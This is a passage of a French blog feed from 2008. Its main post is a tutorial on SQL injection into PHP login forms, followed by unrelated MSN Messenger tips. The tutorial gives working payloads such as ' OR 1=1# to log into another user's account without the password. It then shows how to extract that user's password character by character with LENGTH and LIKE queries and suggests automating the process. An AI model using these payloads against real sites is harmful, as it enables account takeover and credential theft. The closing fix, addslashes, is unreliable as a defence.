j'ai injecté 'a'='a' tout a l'heure.&lt;br /&gt;On va donc revenir a notre exemple avec&lt;span style="color:#ff0000;"&gt;&lt;strong&gt; 'OR 'a'='a&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;Le probléme c'est qu'on a entré &lt;span style="color:#ff0000;"&gt;&lt;strong&gt;'OR 'a'='a&lt;/strong&gt;&lt;/span&gt; en pseudo, et que le site nous a logiquement loggué avec comme login &lt;span style="color:#ff0000;"&gt;&lt;strong&gt;'OR 'a'='a.&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;C'est pas très joli, n'est ce pas ?&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;span style="font-size:180%;"&gt;&lt;strong&gt;3 - Se loguer sur le compte d'une autre personne&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;On va maintenant voir comment se connecter sur le compte d'une autre personne car c'est tout de meme beaucoup plus intéréssant.&lt;br /&gt;Dans notre exemple, on va essayer de se connecter au compte de &lt;strong&gt;TomSawyer&lt;/strong&gt; alors qu'on ne connait pas son mot de passe.&lt;br /&gt;&lt;br /&gt;On va donc commencer par entrer &lt;strong&gt;TomSawyer&lt;/strong&gt; comme login dans le formulaire de connection. Ca c'est logique.&lt;br /&gt;Et on va maintenant utiliser le &lt;strong&gt;#&lt;/strong&gt;. Si vous avez réelement appris le PHP (pas si vous l'avez appris avec 2-3 tutos sur un site web), vous connaissez ce symbole et vous savez ce qu'il fait.&lt;br /&gt;&lt;br /&gt;Un petit rappel pour les autres, tous les instructions que vous allez écrire après le &lt;strong&gt;#&lt;/strong&gt; ne seront pas interprétées.&lt;br /&gt;Et cela va nous etre très utile car on a souvent un quote en trop quand on fait des injections SQL.&lt;br /&gt;&lt;br /&gt;En mot de passe, on va entrer&lt;strong&gt; 'OR 1=1#&lt;/strong&gt;&lt;br /&gt;Ce qui va donner :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Code : SQL&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;TomSawyer&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;' AND password='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;'OR 1=1#&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;'&lt;/span&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Ce qui équivaut également à la requete ci-dessous comme le quote ' après le # n'est pas interprété.&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Code : SQL&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;TomSawyer&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;' AND password='&lt;/span&gt;&lt;/strong&gt;&lt;span style="color:#ff0000;"&gt;&lt;strong&gt;'OR 1=1&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;La reqete selectionne le pseudo &lt;strong&gt;TomSawyer&lt;/strong&gt; si le mot de passe est vide ( '' ) ou si 1=1, comme on l'a déja vu comme 1 est toujours égal à 1, le pseudo &lt;strong&gt;TomSawyer&lt;/strong&gt; sera selectionné et nous nous connecterons a son compte.&lt;br /&gt;&lt;br /&gt;La vérification du mot de passe ne sert plus a rien dans cet exemple comme on arrive a passer à travers.&lt;br /&gt;&lt;br /&gt;On peut faire encore plus simple, regardez ce que cela donne si on entre &lt;strong&gt;TomSawyer'#&lt;/strong&gt; en pseudo et ce que vous voulez en mot de passe.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Code : SQL&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;TomSawyer'#&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;' AND password='&lt;/span&gt; blablabla&lt;/strong&gt;&lt;span style="color:#3333ff;"&gt;&lt;strong&gt;'&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Si vous observez bien les quotes, le login est selectionné sera bien &lt;strong&gt;TomSawyer&lt;/strong&gt; puisque qu'il est entouré de quote.&lt;br /&gt;Le &lt;strong&gt;#&lt;/strong&gt; permet d'occulter tout ce qui se trouve après lui.&lt;br /&gt;Vous pouvez mettre ce que vous voulez en mot de passe comme celui-ci ne sera pas vérifié (à cause du quote '). Mais mettez quelque chose car la plupart des scripts PHP vérifient que les champs du formulaire soient bien remplis.&lt;br /&gt;&lt;br /&gt;La requete SQL sera donc interpreté comme celle qui suit (on a simplement supprimé tout ce qui se trouvait après le #) :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Code : SQL&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;TomSawyer' &lt;/span&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;La requete que nous obtenons est donc simpliste : on selectionne le login &lt;strong&gt;TomSawyer&lt;/strong&gt; (on se connecte avec comme login &lt;strong&gt;TomSawyer&lt;/strong&gt;) et il n'y a aucune vérification.&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;C'était facile, non ?&lt;br /&gt;Maintenant on va essayer de trouver le mot de passe de TomSawyer.&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;span style="font-size:180%;"&gt;&lt;strong&gt;4 - Trouver le mot de passe avec LIKE&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Maintenant vous savez comment entrer sur le compte d'une personne sans avoir son mot de passe.&lt;br /&gt;Mais cela peut etre de connaitre ce mot de passe.&lt;br /&gt;Par exemple si vous voulez changer le mot de passe de la personne, la plupart du temps le mot de passe initial est démandé.&lt;br /&gt;&lt;br /&gt;On va continuer a faire des injections SQL dans le formulaire de connection pour trouver le mot de passe.&lt;br /&gt;&lt;br /&gt;La première chose a faire quand on cherche un mot de passe, c'est de trouver sa longueur grâce à la fonction LENGTH.&lt;br /&gt;On va entrer comme login &lt;span style="color:#ff0000;"&gt;TomSawyer' AND LENGTH(password)=4#&lt;/span&gt; et ce que vous voulez en mot de passe.&lt;br /&gt;&lt;br /&gt;La requete sera alors :&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Code : SQL&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;TomSawyer' AND LENGTH(password)=4#&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;' AND password='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;blablabla&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;'&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;qui équivaut a la requete suivante apreès suppression des instructions après le # :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Code : SQL&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;/strong&gt;&lt;span style="color:#ff0000;"&gt;&lt;strong&gt;TomSawyer' AND LENGTH(password)=4&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Si vous vous connectez au compte de &lt;strong&gt;TomSawyer&lt;/strong&gt; cela signifie que son mot de passe fait 4 caractéres.&lt;br /&gt;Si cela ne marche pas, essayer avec 5, 6, 7, 8 etc...&lt;br /&gt;Plus le mot de passe est long, plus il sera dur a trouver.&lt;br /&gt;&lt;br /&gt;Si le mot de passe est crypté en MD5, sa longueur sera 32 et il sera très difficile à trouver.&lt;br /&gt;&lt;br /&gt;Maintenant qu'on connait la longueur du mot de passe, on va essayer de le trouver.&lt;br /&gt;Je vous préviens tout de suite, c'est pas très marrant à faire et c'est très répétitif. Vous pouvez d'ailleurs créer un script qui le fait a votre place, mais vous ne pourrez le faire qu'une fois que vous aurez bien compris le principe.&lt;br /&gt;&lt;br /&gt;On va maintenant utiliser &lt;strong&gt;LIKE.&lt;/strong&gt;&lt;br /&gt;Mettez &lt;span style="color:#ff0000;"&gt;TomSawyer' AND password LIKE 'a%'#&lt;/span&gt; en pseudo.&lt;br /&gt;&lt;br /&gt;La requête devrait etre :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Code : SQL&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;TomSawyer' AND password LIKE 'a%'#&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;' AND password='&lt;/span&gt;blablabla&lt;span style="color:#3333ff;"&gt;' &lt;/span&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;équivalent à :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Code : SQL&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#3333ff;"&gt;&lt;strong&gt;SELECT login FROM users WHERE login='&lt;/strong&gt;&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;&lt;strong&gt;TomSawyer' AND password LIKE 'a%'&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Si le mot de passe de TomSawyer commence par un a, vous vous connectez a son compte.&lt;br /&gt;Si vous restez sur la page de connection c'est que son mot de passe ne commence pas par un &lt;strong&gt;a&lt;/strong&gt;, essayez donc avec &lt;strong&gt;b&lt;/strong&gt;, puis &lt;strong&gt;c &lt;/strong&gt;etc (vous connaissez l'alpahbet).&lt;br /&gt;Si vous ne trouvez toujours pas essayer des chiffres (1,2,3). Attention a essayer les chiffres, chiffre par chiffre, n'essayez pas directement 12 par exemple.&lt;br /&gt;&lt;br /&gt;Si le mot de passe est codé en MD5, on aura pas besoin d'essayer toutes les lettres. En effet les mots de passes codés en MD5 sont en hexadécimal donc ils ne sont composés que des chiffres de 0 à 9 et de a,b,c,d et e.&lt;br /&gt;Par contre il sera difficile car cela sera une suite de chiffre et de lettre sans aucun sens.&lt;br /&gt;&lt;br /&gt;Une fois que vous avez trouvé la première lettre, il faut trouver la deuxiéme (logique).&lt;br /&gt;Mettez alors &lt;span style="color:#ff0000;"&gt;TomSawyer' AND password LIKE 'aa%'#&lt;/span&gt; en pseudo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Code : SQL&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;TomSawyer' AND password LIKE 'aa%'#&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Si cela ne marche pas c'est que la deuxiéme lettre n'est pas &lt;strong&gt;a&lt;/strong&gt;.&lt;br /&gt;On va donc essayer avec &lt;strong&gt;b&lt;/strong&gt; comme deuxiéme lettre.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Code : SQL&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;SELECT login FROM users WHERE login='&lt;/span&gt;&lt;/strong&gt;&lt;span style="color:#ff0000;"&gt;&lt;strong&gt;TomSawyer' AND password LIKE 'ab%'#&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Et on tente les lettres les unes après les autres jusqu'a ce que cela marche, quand vous avez essayer les lettres de&lt;strong&gt; a&lt;/strong&gt; à &lt;strong&gt;z&lt;/strong&gt;, essayez les chiffres de &lt;strong&gt;0&lt;/strong&gt; à &lt;strong&gt;9&lt;/strong&gt;.&lt;br /&gt;&lt;br /&gt;Si cela ne marche toujours pas, il se peut que les mot de passe soient sensibles a la casse (majuscules et minuscules) ou encore qu'il y ai des caractéres spéciaux. C'est beaucoup beaucoup plus dur dans ces cas là.&lt;br /&gt;&lt;br /&gt;Les dernières lettres du mot de passe sont souvent plus faciles a trouver car quand le mot de passe a un sens, on le devine souvent.&lt;br /&gt;&lt;br /&gt;Dans notre exemple, imaginons qu'après 20 minutes, on est les 3 premières lettres (sur les 4).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Code : SQL&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#3333ff;"&gt;&lt;strong&gt;SELECT login FROM users WHERE login='&lt;/strong&gt;&lt;/span&gt;&lt;span style="color:#ff0000;"&gt;&lt;strong&gt;TomSawyer' AND password LIKE 'all%'#&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;Pour la prochaine et dernière lettre (4éme), on tentera directement avec un &lt;strong&gt;o&lt;/strong&gt; plutot que d'essayer encore une fois toutes les lettres de l'alphabet en commencant par &lt;strong&gt;a&lt;/strong&gt;.&lt;br /&gt;&lt;br /&gt;Une fois le mot de passe trouvé, dans ce cas là c'est &lt;strong&gt;allo&lt;/strong&gt; (oui c'est assez idiot comme mot de passe, mais c'est un exemple simple).&lt;br /&gt;&lt;br /&gt;Comme vous avez pu le voir la methode est longue, mais c'est plus rapide quand on connait la longueur du mot de passe et comme je vous l'ai déja dit, c'est assez simple de concevoir un script qui teste tout a votre place&lt;br /&gt;Le script sera bien plus rapide que les logiciels qui teste en brute force car il teste beaucoup moins de possibilités puisque et il saura que dès qu'il a une lettre bonne.&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;span style="font-size:180%;"&gt;&lt;strong&gt;5 - Corriger la faille&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Si vous etes webmaster et que votre hébergeur a désactivé la fonction &lt;strong&gt;get_magic_quotes_gpc()&lt;/strong&gt; alors vous pouvez etre victime d'injection SQL.&lt;br /&gt;Pour vous protéger vous et vos membres, utilisez la fonction &lt;strong&gt;addlashes()&lt;/strong&gt; qui rajoute des anti-slashs devant les quotes ' si &lt;strong&gt;get_magic_quotes_gpc()&lt;/strong&gt; est désactivée.&lt;br /&gt;&lt;br /&gt;Par exemple :&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Code : PHP&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;$login&lt;/span&gt; = &lt;span style="color:#33cc00;"&gt;addslashes(&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;$_POST['login']&lt;/span&gt;&lt;span style="color:#33cc00;"&gt;)&lt;/span&gt;;&lt;br /&gt;&lt;span style="color:#3333ff;"&gt;$password&lt;/span&gt; = &lt;span style="color:#33cc00;"&gt;addslashes(&lt;/span&gt;&lt;span style="color:#3333ff;"&gt;$_POST['password']&lt;/span&gt;&lt;span style="color:#33cc00;"&gt;)&lt;/span&gt;;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si vous êtes un utilisateur, je vous conseille de bien choisir vos mot de passe, si possible long et avec des chiffres car comme vous avez pu le voir, ils sont bien plus durs à trouver.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-63325197222430657?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/63325197222430657/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/les-injections-sql-trouver-un-mot-de.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/63325197222430657'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/63325197222430657'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/les-injections-sql-trouver-un-mot-de.html' title='Les injections SQL : Trouver un mot de passe'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_f87oXEJfKnY/SSHpDAdkAAI/AAAAAAAAA6I/b2L59WeAVUA/s72-c/code+dessin+SQL.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-6387734655588136407</id><published>2008-11-17T11:56:00.000-08:00</published><updated>2009-03-06T07:39:36.611-08:00</updated><title type='text'>MSN Astuces</title><content type='html'>&lt;div align="center"&gt;&lt;span style="font-size:180%;color:#3333ff;"&gt;&lt;strong&gt;&lt;em&gt;Voici plusieurs astuces pour &lt;span style="color:#000066;"&gt;MSN&lt;/span&gt; Messenger qui vous faciliteront son utilisation&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;img id="BLOGGER_PHOTO_ID_5269718795130115266" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 326px; CURSOR: hand; HEIGHT: 400px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_f87oXEJfKnY/SSHNUvHuFMI/AAAAAAAAA5I/8qswFEmCJ9I/s400/msn1%5B1%5D.jpg" border="0" /&gt;&lt;br /&gt;&lt;p align="center"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#cc0000;"&gt;&lt;strong&gt;Comment savoir si un contact vous à supprimé sur MSN&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Le but de cette manipulation est de savoir si votre contact vous a supprimé de sa liste de contact &lt;em&gt;(j'ai bien dit supprimé et pas bloqué).&lt;/em&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br /&gt;&lt;p align="center"&gt;&lt;br /&gt;&lt;strong&gt;Pour le savoir pas besoin de logiciel. En vous rendant dans la liste de contact via le panneau de configuration de MSN. Vous retrouverez cette info indirectement.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Pour aller au panneau de configuration&lt;br /&gt;&lt;br /&gt;&lt;em&gt;Outils &gt;&gt; Options&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Ensuite il faut choisir l'onglet &lt;em&gt;CONFIDENTIALITE&lt;/em&gt;&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;A gauche vous retrouverez la liste de vos contacts qui peut vous voir en ligne, à droite ceux que vous avez bloqué.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Maintenant en faisant un simple click droit sur un contact vous obtiendrez l'information.&lt;br /&gt;Si la case supprimé est grisée vous êtes toujours dans la liste de votre contact.&lt;br /&gt;Par contre si vous avez la possibilité de la supprimer la personne vous à retiré de sa liste de contact.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5269719056526571346" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 125px; CURSOR: hand; HEIGHT: 93px; TEXT-ALIGN: center" alt="" src="http://2.bp.blogspot.com/_f87oXEJfKnY/SSHNj85fd1I/AAAAAAAAA5Q/GnImVDBN01k/s400/09f26768efb63000%5B1%5D.jpg" border="0" /&gt;&lt;br /&gt;&lt;p align="center"&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#cc0000;"&gt;&lt;span style="font-size:130%;"&gt;Faire un zoom&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;strong&gt;Faire un zoom dans une fenêtre de conversation. Tenir Ctrl et jouez avec le Scroll de votre souris&lt;/strong&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;img id="BLOGGER_PHOTO_ID_5269719398308896946" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 256px; CURSOR: hand; HEIGHT: 256px; TEXT-ALIGN: center" alt="" src="http://2.bp.blogspot.com/_f87oXEJfKnY/SSHN32Iv4LI/AAAAAAAAA5Y/Fh1I2KkdJzo/s400/messenger_3D_v2%5B1%5D.png" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;p align="center"&gt;&lt;strong&gt;&lt;span style="color:#cc0000;"&gt;&lt;span style="font-size:130%;"&gt;Répéter un texte&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#cc0000;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;br /&gt;&lt;p align="center"&gt;&lt;strong&gt;Répéter un texte déjà écrit ! Dans la fenêtre de conversation une personne vous demande de réécrire votre dernier texte. Pas de problème Ctrl + la touche haut du clavier et vous retrouver vos texte écrits.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5269719656810483234" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 128px; CURSOR: hand; HEIGHT: 128px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_f87oXEJfKnY/SSHOG5IVDiI/AAAAAAAAA5g/8pXg_d87RR4/s400/PimpeD_MSN_Messenger%5B1%5D.gif" border="0" /&gt;&lt;br /&gt;&lt;p align="center"&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#cc0000;"&gt;Caractères spéciaux&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p align="center"&gt;&lt;strong&gt;Caracteres Speciaux : Des signe arabes et tout des trucs comme ça comme nom. Voila lastuce : allez dans le menu &lt;em&gt;démarrer&lt;/em&gt; &gt; &lt;em&gt;tout les programmes&lt;/em&gt; &gt; &lt;em&gt;accessoires&lt;/em&gt; &gt; &lt;em&gt;outils système&lt;/em&gt; &gt; table des caractères et voila , vous avez de superbes caractères.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5269719844873494962" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 359px; CURSOR: hand; HEIGHT: 350px; TEXT-ALIGN: center" alt="" src="http://1.bp.blogspot.com/_f87oXEJfKnY/SSHOR1uC4bI/AAAAAAAAA5o/i2hAJafaJQo/s400/backgroundchanger1%5B1%5D.jpg" border="0" /&gt; &lt;p align="center"&gt;&lt;br /&gt;&lt;strong&gt;Quand votre fenêtre de conversation est trop chargée soit par le texte ou par les smiley's ou peut être par les envoie de fichier,taper simplement /clear dans la fenetre de conversation comme si vous parliez a votre correspondant(e), cela efacera toute le conversation, ce qui vous permetera certainement de vous y retrouver ( à taper dans la fenetre de conversation et nescésite MSG + )&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5269720202569940082" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 334px; CURSOR: hand; HEIGHT: 400px; TEXT-ALIGN: center" alt="" src="http://3.bp.blogspot.com/_f87oXEJfKnY/SSHOmqPhfHI/AAAAAAAAA5w/im0gJq86drQ/s400/coeur%2520China%2520MSN%5B1%5D.jpg" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p align="center"&gt;&lt;br /&gt;&lt;strong&gt;Si vous avez envie d'aparaitre Hors Ligne taper /appearoffline , cela vous permetera d'aparaitre hors ligne ( à taper dans la fenetre de conversation et nescésite MSG + )&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-6387734655588136407?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/6387734655588136407/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/msn-astuces.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6387734655588136407'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6387734655588136407'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/msn-astuces.html' title='MSN Astuces'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_f87oXEJfKnY/SSHNUvHuFMI/AAAAAAAAA5I/8qswFEmCJ9I/s72-c/msn1%5B1%5D.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-494265416973764074</id><published>2008-11-11T16:26:00.000-08:00</published><updated>2009-03-06T07:41:06.640-08:00</updated><title type='text'>MSN Dangers en Vidéo</title><content type='html'>&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="font-size:130%;color:#cc0000;"&gt;Bonjour à tous, voici une petite vidéo que j'ai réalisé en deux parties pour vous prévenir des dangers des scripts de MSN Messenger Live Plus&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;strong&gt;Partie 1&lt;/strong&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/QblA43AgDWs&amp;amp;hl=fr&amp;amp;fs=1&amp;amp;rel=0&amp;amp;color1=0x006699&amp;amp;color2=0x54abd6"&gt;&lt;param 